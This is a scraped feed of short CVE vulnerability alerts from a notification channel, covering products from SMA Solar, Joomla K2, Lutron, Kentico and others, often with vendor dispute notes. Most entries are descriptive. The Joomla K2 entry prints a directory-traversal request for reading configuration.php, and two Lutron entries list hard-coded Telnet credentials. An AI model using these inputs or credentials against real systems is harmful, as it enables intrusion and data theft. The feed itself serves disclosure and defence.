🚨 CVE-2017-9854An issue was discovered in SMA Solar Technology products. By sniffing for specific packets on the localhost, plaintext passwords can be obtained as they are typed into Sunny Explorer by the user. These passwords can then be used to compromise the overall device. NOTE: the vendor reports that exploitation likelihood is low because these packets are usually sent only once during installation. Also, only Sunny Boy TLST-21 and TL-21 and Sunny Tripower TL-10 and TL-30 could potentially be affected🎖@cveNotify |
|
| 2024-08-05 18:37:25 |
🚨 CVE-2017-9833/cgi-bin/wapopen in Boa 0.94.14rc21 allows the injection of "../.." using the FILECAMERA variable (sent by GET) to read files with root privileges. NOTE: multiple third parties report that this is a system-integrator issue (e.g., a vulnerability on one type of camera) because Boa does not include any wapopen program or any code to read a FILECAMERA variable.🎖@cveNotify |
|
| 2024-08-05 17:37:41 |
🚨 CVE-2024-29859In MISP before 2.4.187, add_misp_export in app/Controller/EventsController.php does not properly check for a valid file upload.🎖@cveNotify |
|
| 2024-08-05 17:37:40 |
🚨 CVE-2023-38825SQL injection vulnerability in Vanderbilt REDCap before v.13.8.0 allows a remote attacker to obtain sensitive information via the password reset mechanism in MyCapMobileApp/update.php.🎖@cveNotify |
|
| 2024-08-05 17:37:36 |
🚨 CVE-2024-28394An issue in Advanced Plugins reportsstatistics v1.3.20 and before allows a remote attacker to execute arbitrary code via the Sales Reports, Statistics, Custom Fields & Export module.🎖@cveNotify |
|
| 2024-08-05 17:37:35 |
🚨 CVE-2017-9443BigTree CMS through 4.2.18 allows remote authenticated users to conduct SQL injection attacks via a crafted tables object in manifest.json in an uploaded package. This issue exists in core\admin\modules\developer\extensions\install\process.php and core\admin\modules\developer\packages\install\process.php. NOTE: the vendor states "You must implicitly trust any package or extension you install as they all have the ability to write PHP files.🎖@cveNotify |
|
| 2024-08-05 17:37:31 |
🚨 CVE-2017-9441Multiple cross-site scripting (XSS) vulnerabilities in BigTree CMS through 4.2.18 allow remote authenticated users to inject arbitrary web script or HTML by uploading a crafted package, triggering mishandling of the (1) title or (2) version or (3) author_name parameter in manifest.json. This issue exists in core\admin\modules\developer\extensions\install\unpack.php and core\admin\modules\developer\packages\install\unpack.php. NOTE: the vendor states "You must implicitly trust any package or extension you install as they all have the ability to write PHP files.🎖@cveNotify |
|
| 2024-08-05 17:37:30 |
🚨 CVE-2017-8769Facebook WhatsApp Messenger before 2.16.323 for Android uses the SD card for cleartext storage of files (Audio, Documents, Images, Video, and Voice Notes) associated with a chat, even after that chat is deleted. There may be users who expect file deletion to occur upon chat deletion, or who expect encryption (consistent with the application's use of an encrypted database to store chat text). NOTE: the vendor reportedly indicates that they do not "consider these to be security issues" because a user may legitimately want to preserve any file for use "in other apps like the Google Photos gallery" regardless of whether its associated chat is deleted🎖@cveNotify |
|
| 2024-08-05 17:37:29 |
🚨 CVE-2017-8912CMS Made Simple (CMSMS) 2.1.6 allows remote authenticated administrators to execute arbitrary PHP code via the code parameter to admin/editusertag.php, related to the CreateTagFunction and CallUserTag functions. NOTE: the vendor reportedly has stated this is "a feature, not a bug.🎖@cveNotify |
|
| 2024-08-05 17:37:26 |
🚨 CVE-2017-8459Brave 0.12.4 has a Status Bar Obfuscation issue in which a redirection target is shown in a possibly unexpected way. NOTE: third parties dispute this issue because it is a behavior that might have legitimate applications in (for example) the display of web-search results🎖@cveNotify |
|
| 2024-08-05 17:37:25 |
🚨 CVE-2017-7963The GNU Multiple Precision Arithmetic Library (GMP) interfaces for PHP through 7.1.4 allow attackers to cause a denial of service (memory consumption and application crash) via operations on long strings. NOTE: the vendor disputes this, stating "There is no security issue here, because GMP safely aborts in case of an OOM condition. The only attack vector here is denial of service. However, if you allow attacker-controlled, unbounded allocations you have a DoS vector regardless of GMP's OOM behavior.🎖@cveNotify |
|
| 2024-08-05 17:37:24 |
🚨 CVE-2017-7961The cr_tknzr_parse_rgb function in cr-tknzr.c in libcroco 0.6.11 and 0.6.12 has an "outside the range of representable values of type long" undefined behavior issue, which might allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted CSS file. NOTE: third-party analysis reports "This is not a security issue in my view. The conversion surely is truncating the double into a long value, but there is no impact as the value is one of the RGB components.🎖@cveNotify |
|
| 2024-08-05 16:37:43 |
🚨 CVE-2024-40530Insecure Permissions vulnerability in UAB Lexita PanteraCRM CMS v.401.152 and Patera CRM CMS v.402.072 allows a remote attacker to execute arbitrary code via modification of the X-Forwarded-For header component.🎖@cveNotify |
|
| 2024-08-05 16:37:42 |
🚨 CVE-2023-31355Improper restriction of write operations in SNP firmware could allow a malicious hypervisor to overwrite a guest's UMC seed potentially allowing reading of memory from a decommissioned guest.🎖@cveNotify |
|
| 2024-08-05 16:37:41 |
🚨 CVE-2024-4607Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations to gain access to already freed memory.This issue affects Bifrost GPU Kernel Driver: from r41p0 through r49p0; Valhall GPU Kernel Driver: from r41p0 through r49p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p0.🎖@cveNotify |
|
| 2024-08-05 16:37:38 |
🚨 CVE-2024-2937Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user to make improper GPU memory processing operations to gain access to already freed memory.This issue affects Bifrost GPU Kernel Driver: from r41p0 through r49p0; Valhall GPU Kernel Driver: from r41p0 through r49p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p0.🎖@cveNotify |
|
| 2024-08-05 16:37:37 |
🚨 CVE-2024-33894Insecure Permission vulnerability in Cosy+ devices running a firmware 21.x below 21.2s10 or a firmware 22.x below 22.1s3 are executing several processes with elevated privileges.🎖@cveNotify |
|
| 2024-08-05 16:37:36 |
🚨 CVE-2024-34252wasm3 v0.5.0 was discovered to contain a global buffer overflow which leads to segmentation fault via the function "PreserveRegisterIfOccupied" in wasm3/source/m3_compile.c.🎖@cveNotify |
|
| 2024-08-05 16:37:35 |
🚨 CVE-2023-49982Broken access control in the component /admin/management/users of School Fees Management System v1.0 allows attackers to escalate privileges and perform Administrative actions, including adding and deleting user accounts.🎖@cveNotify |
|
| 2024-08-05 16:37:31 |
🚨 CVE-2022-46091Cross Site Scripting (XSS) vulnerability in the feedback form of Online Flight Booking Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the airline parameter.🎖@cveNotify |
|
| 2024-08-05 16:37:30 |
🚨 CVE-2017-6363In the GD Graphics Library (aka LibGD) through 2.2.5, there is a heap-based buffer over-read in tiffWriter in gd_tiff.c. NOTE: the vendor says "In my opinion this issue should not have a CVE, since the GD and GD2 formats are documented to be 'obsolete, and should only be used for development and testing purposes.'🎖@cveNotify |
|
| 2024-08-05 16:37:26 |
🚨 CVE-2017-7306Riverbed RiOS through 9.6.0 has a weak default password for the secure vault, which makes it easier for physically proximate attackers to defeat the secure-vault protection mechanism by leveraging knowledge of the password algorithm and the appliance serial number. NOTE: the vendor believes that this does not meet the definition of a vulnerability. The product contains correct computational logic for supporting arbitrary password changes by customers; however, a password change is optional to meet different customers' needs🎖@cveNotify |
|
| 2024-08-05 16:37:25 |
🚨 CVE-2017-7397BackBox Linux 4.6 allows remote attackers to cause a denial of service (ksoftirqd CPU consumption) via a flood of packets with Martian source IP addresses (as defined in RFC 1812 section 5.3.7). This product enables net.ipv4.conf.all.log_martians by default. NOTE: the vendor reports "It has been proved that this vulnerability has no foundation and it is totally fake and based on false assumptions.🎖@cveNotify |
|
| 2024-08-05 16:37:24 |
🚨 CVE-2017-6441The _zval_get_long_func_ex in Zend/zend_operators.c in PHP 7.1.2 allows attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted use of "declare(ticks=" in a PHP script. NOTE: the vendor disputes the classification of this as a vulnerability, stating "Please do not request CVEs for ordinary bugs. CVEs are relevant for security issues only.🎖@cveNotify |
|
| 2024-08-05 15:37:44 |
🚨 CVE-2024-21481Memory corruption when preparing a shared memory notification for a memparcel in Resource Manager.🎖@cveNotify |
|
| 2024-08-05 15:37:43 |
🚨 CVE-2024-21459Information disclosure while handling beacon or probe response frame in STA.🎖@cveNotify |
|
| 2024-08-05 15:37:39 |
🚨 CVE-2024-5081The wp-eMember WordPress plugin before v10.7.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack🎖@cveNotify |
|
| 2024-08-05 15:37:38 |
🚨 CVE-2024-3219There is a MEDIUM severity vulnerability affecting CPython.The “socket” module provides a pure-Python fallback to the socket.socketpair() function for platforms that don’t support AF_UNIX, such as Windows. This pure-Python implementation uses AF_INET or AF_INET6 to create a local connected pair of sockets. The connection between the two sockets was not verified before passing the two sockets back to the user, which leaves the server socket vulnerable to a connection race from a malicious local peer.Platforms that support AF_UNIX such as Linux and macOS are not affected by this vulnerability. Versions prior to CPython 3.5 are not affected due to the vulnerable API not being included.🎖@cveNotify |
|
| 2024-08-05 15:37:37 |
🚨 CVE-2024-6162A vulnerability was found in Undertow, where URL-encoded request paths can be mishandled during concurrent requests on the AJP listener. This issue arises because the same buffer is used to decode the paths for multiple requests simultaneously, leading to incorrect path information being processed. As a result, the server may attempt to access the wrong path, causing errors such as "404 Not Found" or other application failures. This flaw can potentially lead to a denial of service, as legitimate resources become inaccessible due to the path mix-up.🎖@cveNotify |
|
| 2024-08-05 15:37:33 |
🚨 CVE-2023-40288An issue was discovered on Supermicro X11SSM-F, X11SAE-F, and X11SSE-F 1.66 devices. An attacker could exploit an XSS issue.🎖@cveNotify |
|
| 2024-08-05 15:37:32 |
🚨 CVE-2023-40284An issue was discovered on Supermicro X11SSM-F, X11SAE-F, and X11SSE-F 1.66 devices. An attacker could exploit an XSS issue.🎖@cveNotify |
|
| 2024-08-05 15:37:31 |
🚨 CVE-2024-29301SourceCodester PHP Task Management System 1.0 is vulnerable to SQL Injection via update-admin.php?admin_id=🎖@cveNotify |
|
| 2024-08-05 15:37:27 |
🚨 CVE-2024-27626A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in Dotclear version 2.29. The flaw exists within the Search functionality of the Admin Panel.🎖@cveNotify |
|
| 2024-08-05 15:37:26 |
🚨 CVE-2020-26942An issue discovered in Axigen Mail Server 10.3.x before 10.3.1.27 and 10.3.2.x before 10.3.3.1 allows unauthenticated attackers to submit a setAdminPassword operation request, subsequently setting a new arbitrary password for the admin account.🎖@cveNotify |
|
| 2024-08-05 15:37:25 |
🚨 CVE-2024-25331DIR-822 Rev. B Firmware v2.02KRB09 and DIR-822-CA Rev. B Firmware v2.03WWb01 suffer from a LAN-Side Unauthenticated Remote Code Execution (RCE) vulnerability elevated from HNAP Stack-Based Buffer Overflow.🎖@cveNotify |
|
| 2024-08-05 15:37:24 |
🚨 CVE-2024-27211In AtiHandleAPOMsgType of ati_Main.c, there is a possible OOB write due to a missing null check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-08-05 13:37:24 |
🚨 CVE-2018-1000204Linux Kernel version 3.18 to 4.16 incorrectly handles an SG_IO ioctl on /dev/sg0 with dxfer_direction=SG_DXFER_FROM_DEV and an empty 6-byte cmdp. This may lead to copying up to 1000 kernel heap pages to the userspace. This has been fixed upstream in https://github.com/torvalds/linux/commit/a45b599ad808c3c982fdcdc12b0b8611c2f92824 already. The problem has limited scope, as users don't usually have permissions to access SCSI devices. On the other hand, e.g. the Nero user manual suggests doing `chmod o+r+w /dev/sg*` to make the devices accessible. NOTE: third parties dispute the relevance of this report, noting that the requirement for an attacker to have both the CAP_SYS_ADMIN and CAP_SYS_RAWIO capabilities makes it "virtually impossible to exploit.🎖@cveNotify |
|
| 2024-08-05 13:07:26 |
🚨 CVE-2024-7029Commands can be injected over the network and executed without authentication.🎖@cveNotify |
|
| 2024-08-05 13:07:25 |
🚨 CVE-2024-38890An issue in Horizon Business Services Inc. Caterease Software 16.0.1.1663 through 24.0.1.2405 and possibly later versions allows a local attacker to perform an Authentication Bypass by Capture-replay attack due to insufficient protection against capture-replay attacks.🎖@cveNotify |
|
| 2024-08-05 12:37:25 |
🚨 CVE-2018-18603360 Total Security 3.5.0.1033 allows a Sandbox Escape via an "import os" statement, followed by os.system("CMD") or os.system("PowerShell"), within a .py file. NOTE: the vendor's position is that this cannot be categorized as a vulnerability, although it is a security-related issue🎖@cveNotify |
|
| 2024-08-05 12:37:24 |
🚨 CVE-2018-18586chmextract.c in the chmextract sample program, as distributed with libmspack before 0.8alpha, does not protect against absolute/relative pathnames in CHM files, leading to Directory Traversal. NOTE: the vendor disputes that this is a libmspack vulnerability, because chmextract.c was only intended as a source-code example, not a supported application🎖@cveNotify |
|
| 2024-08-05 11:37:43 |
🚨 CVE-2018-18466An issue was discovered in SecurEnvoy SecurAccess 9.3.502. When put in Debug mode and used for RDP connections, the application stores the emergency credentials in cleartext in the logs (present in the DEBUG folder) that can be accessed by anyone. NOTE: The vendor disputes this as a vulnerability since the disclosure of a local account password (actually an alpha numeric passcode) is achievable only when a custom registry key is added to the windows registry. This action requires administrator access and the registry key is only provided by support staff at securenvoy to troubleshoot customer issues🎖@cveNotify |
|
| 2024-08-05 11:37:42 |
🚨 CVE-2018-18014* Lack of authentication in Citrix Xen Mobile through 10.8 allows low-privileged local users to execute system commands as root by making requests to private services listening on ports 8000, 30000 and 30001. NOTE: the vendor disputes that this is a vulnerability, stating it is "already mitigated by the internal firewall that limits access to configuration services to localhost.🎖@cveNotify |
|
| 2024-08-05 11:37:41 |
🚨 CVE-2018-18013* Xen Mobile through 10.8.0 includes a service listening on port 5001 within its firewall that accepts unauthenticated input. If this service is supplied with raw serialised Java objects, it deserialises them back into Java objects in memory, giving rise to a remote code execution vulnerability. NOTE: the vendor disputes that this is a vulnerability, stating it is "already mitigated by the internal firewall that limits access to configuration services to localhost.🎖@cveNotify |
|
| 2024-08-05 11:37:38 |
🚨 CVE-2018-18307A Stored XSS vulnerability has been discovered in version 4.1.0 of AlchemyCMS via the /admin/pictures image field. NOTE: the vendor's position is that this is not a valid report: "The researcher used an authorized cookie to perform the request to a password-protected route. Without that session cookie, the request would have been rejected as unauthorized."🎖@cveNotify |
|
| 2024-08-05 11:37:37 |
🚨 CVE-2018-18320An issue was discovered in the Merlin.PHP component 0.6.6 for Asuswrt-Merlin devices. An attacker can execute arbitrary commands because exec.php has a popen call. NOTE: the vendor indicates that Merlin.PHP is designed only for use on a trusted intranet network, and intentionally allows remote code execution🎖@cveNotify |
|
| 2024-08-05 11:37:36 |
🚨 CVE-2018-18290An issue was discovered in nc-cms through 2017-03-10. index.php?action=edit_html&name=home_content allows XSS via the HTML Source Editor. NOTE: the vendor disputes this because the form requires administrator privileges, and entering JavaScript is supported functionality🎖@cveNotify |
|
| 2024-08-05 11:37:32 |
🚨 CVE-2018-17538Axon (formerly TASER International) Evidence Sync 3.15.89 is vulnerable to process injection. NOTE: the vendor's position is that this CVE is not associated with information that supports any finding of any type of vulnerability🎖@cveNotify |
|
| 2024-08-05 11:37:31 |
🚨 CVE-2018-17402The PhonePe wallet (aka com.PhonePe.app) application 3.0.6 through 3.3.26 for Android might allow attackers to discover the Credit/Debit card number, expiration date, and CVV number. NOTE: the vendor says that, to exploit this, the user has to explicitly install a malicious app and provide accessibility permission to the malicious app, that the Android platform provides fair warnings to the users before turning on accessibility for any application, and that it believes it is similar to installing malicious keyboards, or malicious apps taking screenshots🎖@cveNotify |
|
| 2024-08-05 11:37:30 |
🚨 CVE-2018-17400The PhonePe wallet (aka com.PhonePe.app) application 3.0.6 through 3.3.26 for Android might allow attackers to perform Account Takeover attacks by intercepting the user name and PIN during the initial configuration of the application. NOTE: the vendor says that, to exploit this, the user has to explicitly install a malicious app and provide accessibility permission to the malicious app, that the Android platform provides fair warnings to the users before turning on accessibility for any application, and that it believes it is similar to installing malicious keyboards, or malicious apps taking screenshots🎖@cveNotify |
|
| 2024-08-05 11:37:26 |
🚨 CVE-2018-17103An issue was discovered in GetSimple CMS v3.3.13. There is a CSRF vulnerability that can change the administrator's password via admin/settings.php. NOTE: The vendor reported that the PoC was sending a value for the nonce parameter🎖@cveNotify |
|
| 2024-08-05 11:37:25 |
🚨 CVE-2018-16310Technicolor TG588V V2 devices allow remote attackers to cause a denial of service (networking outage) via a flood of random MAC addresses, as demonstrated by macof. NOTE: this might overlap CVE-2018-15852 and CVE-2018-15907. NOTE: Technicolor denies that the described behavior is a vulnerability and states that Wi-Fi traffic is slowed or stopped only while the devices are exposed to a MAC flooding attack. This has been confirmed through testing against official up-to-date versions🎖@cveNotify |
|
| 2024-08-05 11:37:24 |
🚨 CVE-2018-16585An issue was discovered in Artifex Ghostscript before 9.24. The .setdistillerkeys PostScript command is accepted even though it is not intended for use during document processing (e.g., after the startup phase). This leads to memory corruption, allowing remote attackers able to supply crafted PostScript to crash the interpreter or possibly have unspecified other impact. Note: A reputable source believes that the CVE is potentially a duplicate of CVE-2018-15910 as explained in Red Hat bugzilla (https://bugzilla.redhat.com/show_bug.cgi?id=1626193)🎖@cveNotify |
|
| 2024-08-05 10:37:42 |
🚨 CVE-2018-15543An issue was discovered in the org.telegram.messenger application 4.8.11 for Android. The FingerprintManager class for Biometric validation allows authentication bypass through the callback method from onAuthenticationFailed to onAuthenticationSucceeded with null, because the fingerprint API in conjunction with the Android keyGenerator class is not implemented. In other words, an attacker could authenticate with an arbitrary fingerprint. NOTE: the vendor indicates that this is not an attack of interest within the context of their threat model, which excludes Android devices on which rooting has occurred🎖@cveNotify |
|
| 2024-08-05 10:37:41 |
🚨 CVE-2018-15474CSV Injection (aka Excel Macro Injection or Formula Injection) in /lib/plugins/usermanager/admin.php in DokuWiki 2018-04-22a and earlier allows remote attackers to exfiltrate sensitive data and to execute arbitrary code via a value that is mishandled in a CSV export. NOTE: the vendor has stated "this is not a security problem in DokuWiki.🎖@cveNotify |
|
| 2024-08-05 10:37:37 |
🚨 CVE-2018-15160The libesedb_catalog_definition_read function in libesedb_catalog_definition.c in libesedb through 2018-04-01 allows remote attackers to cause a heap-based buffer over-read via a crafted esedb file. NOTE: the vendor has disputed this as described in the GitHub issue comments🎖@cveNotify |
|
| 2024-08-05 10:37:36 |
🚨 CVE-2018-15158The libesedb_page_read_values function in libesedb_page.c in libesedb through 2018-04-01 allows remote attackers to cause a heap-based buffer over-read via a crafted esedb file. NOTE: the vendor has disputed this as described in the GitHub issue comments🎖@cveNotify |
|
| 2024-08-05 10:37:35 |
🚨 CVE-2018-15157The libfsclfs_block_read function in libfsclfs_block.c in libfsclfs before 2018-07-25 allows remote attackers to cause a heap-based buffer over-read via a crafted clfs file. NOTE: the vendor has disputed this as described in the GitHub issue comments🎖@cveNotify |
|
| 2024-08-05 10:37:31 |
🚨 CVE-2018-15852Technicolor TC7200.20 devices allow remote attackers to cause a denial of service (networking outage) via a flood of random MAC addresses, as demonstrated by macof. NOTE: Technicolor denies that the described behavior is a vulnerability and states that Wi-Fi traffic is slowed or stopped only while the devices are exposed to a MAC flooding attack. This has been confirmed through testing against official up-to-date versions🎖@cveNotify |
|
| 2024-08-05 10:37:30 |
🚨 CVE-2018-15574An issue was discovered in the license editor in Reprise License Manager (RLM) through 12.2BL2. It is a cross-site scripting vulnerability in the /goform/edit_lf_get_data lf parameter via GET or POST. NOTE: the vendor has stated "We do not consider this a vulnerability."🎖@cveNotify |
|
| 2024-08-05 10:37:26 |
🚨 CVE-2018-15573An issue was discovered in Reprise License Manager (RLM) through 12.2BL2. Attackers can use the web interface to read and write data to any file on disk (as long as rlm.exe has access to it) via /goform/edit_lf_process with file content in the lfdata parameter and a pathname in the lf parameter. By default, the web interface is on port 5054, and does not require authentication. NOTE: the vendor has stated "We do not consider this a vulnerability.🎖@cveNotify |
|
| 2024-08-05 10:37:25 |
🚨 CVE-2018-13843An issue has been found in HTSlib 1.8. It is a memory leak in bgzf_getline in bgzf.c. NOTE: the software maintainer's position is that the "failure to free memory" can be fixed in applications that use the HTSlib library (such as test/test_bgzf.c in the original report) and is not a library issue🎖@cveNotify |
|
| 2024-08-05 10:37:24 |
🚨 CVE-2018-13818Twig before 2.4.4 allows Server-Side Template Injection (SSTI) via the search search_key parameter. NOTE: the vendor points out that Twig itself is not a web application and states that it is the responsibility of web applications using Twig to properly wrap input to it🎖@cveNotify |
|
| 2024-08-05 09:37:43 |
🚨 CVE-2018-12097The liblnk_location_information_read_data function in liblnk_location_information.c in liblnk through 2018-04-19 allows remote attackers to cause an information disclosure (heap-based buffer over-read) via a crafted lnk file. NOTE: the vendor has disputed this as described in libyal/liblnk issue 33 on GitHub🎖@cveNotify |
|
| 2024-08-05 09:37:42 |
🚨 CVE-2018-11731The libfsntfs_mft_entry_read_attributes function in libfsntfs_mft_entry.c in libfsntfs through 2018-04-20 allows remote attackers to cause an information disclosure (heap-based buffer over-read) via a crafted ntfs file. NOTE: the vendor has disputed this as described in libyal/libfsntfs issue 8 on GitHub🎖@cveNotify |
|
| 2024-08-05 09:37:41 |
🚨 CVE-2018-11730The libfsntfs_security_descriptor_values_free function in libfsntfs_security_descriptor_values.c in libfsntfs through 2018-04-20 allows remote attackers to cause a denial of service (double-free) via a crafted ntfs file. NOTE: the vendor has disputed this as described in libyal/libfsntfs issue 8 on GitHub🎖@cveNotify |
|
| 2024-08-05 09:37:38 |
🚨 CVE-2018-11729The libfsntfs_mft_entry_read_header function in libfsntfs_mft_entry.c in libfsntfs through 2018-04-20 allows remote attackers to cause an information disclosure (heap-based buffer over-read) via a crafted ntfs file. NOTE: the vendor has disputed this as described in libyal/libfsntfs issue 8 on GitHub🎖@cveNotify |
|
| 2024-08-05 09:37:37 |
🚨 CVE-2018-11727The libfsntfs_attribute_read_from_mft function in libfsntfs_attribute.c in libfsntfs through 2018-04-20 allows remote attackers to cause an information disclosure (heap-based buffer over-read) via a crafted ntfs file. NOTE: the vendor has disputed this as described in libyal/libfsntfs issue 8 on GitHub🎖@cveNotify |
|
| 2024-08-05 09:37:36 |
🚨 CVE-2018-12422addressbook/backends/ldap/e-book-backend-ldap.c in Evolution-Data-Server in GNOME Evolution through 3.29.2 might allow attackers to trigger a Buffer Overflow via a long query that is processed by the strcat function. NOTE: the software maintainer disputes this because "the code had computed the required string length first, and then allocated a large-enough buffer on the heap.🎖@cveNotify |
|
| 2024-08-05 09:37:31 |
🚨 CVE-2018-12271An issue was discovered in the com.getdropbox.Dropbox app 100.2 for iOS. The LAContext class for Biometric (TouchID) validation allows authentication bypass by overriding the LAContext return Boolean value to be "true" because the kSecAccessControlUserPresence protection mechanism is not used. In other words, an attacker could authenticate with an arbitrary fingerprint. NOTE: the vendor indicates that this is not an attack of interest within the context of their threat model, which excludes iOS devices on which a jailbreak has occurred🎖@cveNotify |
|
| 2024-08-05 09:37:30 |
🚨 CVE-2018-12048A remote attacker can bypass the Management Mode on the Canon LBP7110Cw web interface without a PIN for /checkLogin.cgi via vectors involving /portal_top.html to get full access to the device. NOTE: the vendor reportedly responded that this issue occurs when a customer keeps the default settings without using the countermeasures and best practices shown in the documentation🎖@cveNotify |
|
| 2024-08-05 09:37:26 |
🚨 CVE-2018-11692An issue was discovered on Canon LBP6650, LBP3370, LBP3460, and LBP7750C devices. It is possible to bypass the Administrator Mode authentication for /tlogin.cgi via vectors involving frame.cgi?page=DevStatus. NOTE: the vendor reportedly responded that this issue occurs when a customer keeps the default settings without using the countermeasures and best practices shown in the documentation🎖@cveNotify |
|
| 2024-08-05 09:37:25 |
🚨 CVE-2018-11681Default and unremovable support credentials (user:nwk password:nwk2) allow attackers to gain total super user control of an IoT device through a TELNET session to products using the RadioRA 2 Lutron integration protocol Revision M to Revision Y. NOTE: The vendor disputes this id as not being a vulnerability because what can be done through the ports revolve around controlling lighting, not code execution. A certain set of commands are listed, which bear some similarity to code, but they are not arbitrary and do not allow admin-level control of a machine🎖@cveNotify |
|
| 2024-08-05 09:37:24 |
🚨 CVE-2018-11629Default and unremovable support credentials (user:lutron password:integration) allow attackers to gain total super user control of an IoT device through a TELNET session to products using the HomeWorks QS Lutron integration protocol Revision M to Revision Y. NOTE: The vendor disputes this id as not being a vulnerability because what can be done through the ports revolve around controlling lighting, not code execution. A certain set of commands are listed, which bear some similarity to code, but they are not arbitrary and do not allow admin-level control of a machine🎖@cveNotify |
|
| 2024-08-05 07:37:29 |
🚨 CVE-2018-7567In the Admin Package Manager in Open Ticket Request System (OTRS) 5.0.0 through 5.0.24 and 6.0.0 through 6.0.1, authenticated admins are able to exploit a Blind Remote Code Execution vulnerability by loading a crafted opm file with an embedded CodeInstall element to execute a command on the server during package installation. NOTE: the vendor disputes this issue stating "the behaviour is as designed and needed for different packages to be installed", "there is a security warning if the package is not verified by OTRS Group", and "there is the possibility and responsibility of an admin to check packages before installation which is possible as they are not binary.🎖@cveNotify |
|
| 2024-08-05 07:37:26 |
🚨 CVE-2018-7482The K2 component 2.8.0 for Joomla! has Incorrect Access Control with directory traversal, allowing an attacker to download arbitrary files, as demonstrated by a view=media&task=connector&cmd=file&target=l1_../configuration.php&download=1 request. The specific pathname ../configuration.php should be base64 encoded for a valid attack. NOTE: the vendor disputes this issue because only files under the media-manager path can be downloaded, and the documentation indicates that sensitive information does not belong there. Nonetheless, 2.8.1 has additional blocking of .php downloads🎖@cveNotify |
|
| 2024-08-05 07:37:25 |
🚨 CVE-2018-7205Reflected Cross-Site Scripting vulnerability in "Design" on "Edit device layout" in Kentico 9 through 11 allows remote attackers to execute malicious JavaScript via a malicious devicename parameter in a link that is entered via the "Pages -> Edit template properties -> Device Layouts -> Create device layout (and edit created device layout) -> Design" screens. NOTE: the vendor has responded that there is intended functionality for authorized users to edit and update ascx code layout🎖@cveNotify |
|
| 2024-08-05 07:37:24 |
🚨 CVE-2018-7046Arbitrary code execution vulnerability in Kentico 9 through 11 allows remote authenticated users to execute arbitrary operating system commands in a dynamic .NET code evaluation context via C# code in a "Pages -> Edit -> Template -> Edit template properties -> Layout" box. NOTE: the vendor has responded that there is intended functionality for authorized users to edit and update ascx code layout🎖@cveNotify |
|
| 2024-08-05 06:37:38 |
🚨 CVE-2018-5282Kentico 9.0 through 11.0 has a stack-based buffer overflow via the SqlName, SqlPswd, Database, UserName, or Password field in a SilentInstall XML document. NOTE: the vendor disputes this issue because neither a buffer overflow nor a crash can be reproduced; also, reading XML documents is implemented exclusively with managed code within the Microsoft .NET Framework🎖@cveNotify |
|
| 2024-08-05 06:37:31 |
🚨 CVE-2018-5279In Malwarebytes Premium 3.3.1.2183, the driver file (FARFLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9c40e02c. NOTE: the vendor reported that they "have not been able to reproduce the issue on any Windows operating system version (32-bit or 64-bit).🎖@cveNotify |
|
| 2024-08-05 06:37:30 |
🚨 CVE-2018-5276In Malwarebytes Premium 3.3.1.2183, the driver file (FARFLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9c40e018. NOTE: the vendor reported that they "have not been able to reproduce the issue on any Windows operating system version (32-bit or 64-bit).🎖@cveNotify |
|
| 2024-08-05 06:37:29 |
🚨 CVE-2018-5275In Malwarebytes Premium 3.3.1.2183, the driver file (FARFLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9C40E020. NOTE: the vendor reported that they "have not been able to reproduce the issue on any Windows operating system version (32-bit or 64-bit).🎖@cveNotify |
|
| 2024-08-05 06:37:26 |
🚨 CVE-2018-5274In Malwarebytes Premium 3.3.1.2183, the driver file (FARFLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9C40E024. NOTE: the vendor reported that they "have not been able to reproduce the issue on any Windows operating system version (32-bit or 64-bit).🎖@cveNotify |
|
| 2024-08-05 06:37:25 |
🚨 CVE-2018-5271In Malwarebytes Premium 3.3.1.2183, the driver file (FARFLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9c40e008. NOTE: the vendor reported that they "have not been able to reproduce the issue on any Windows operating system version (32-bit or 64-bit).🎖@cveNotify |
|
| 2024-08-05 06:37:24 |
🚨 CVE-2018-5270In Malwarebytes Premium 3.3.1.2183, the driver file (FARFLT.SYS) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9c40e010. NOTE: the vendor reported that they "have not been able to reproduce the issue on any Windows operating system version (32-bit or 64-bit).🎖@cveNotify |
|
| 2024-08-05 05:37:29 |
🚨 CVE-2024-6118A Plaintext Storage of a Password vulnerability in ebooknote function in Hamastar MeetingHub Paperless Meetings 2021 allows remote attackers to obtain the other users’ credentials and gain access to the product via an XML file.🎖@cveNotify |
|
| 2024-08-05 05:37:26 |
🚨 CVE-2024-6117A Unrestricted upload of file with dangerous type vulnerability in meeting management function in Hamastar MeetingHub Paperless Meetings 2021 allows remote authenticated users to perform arbitrary system commands via a crafted ASP file.🎖@cveNotify |
|
| 2024-08-05 05:37:25 |
🚨 CVE-2024-39838ZWX-2000CSW2-HN firmware versions prior to Ver.0.3.15 uses hard-coded credentials, which may allow a network-adjacent attacker with an administrative privilege to alter the configuration of the device.🎖@cveNotify |
|
| 2024-08-05 05:37:24 |
🚨 CVE-2024-39713A Server-Side Request Forgery (SSRF) affects Rocket.Chat's Twilio webhook endpoint before version 6.10.1.🎖@cveNotify |
|
| 2024-08-05 04:37:25 |
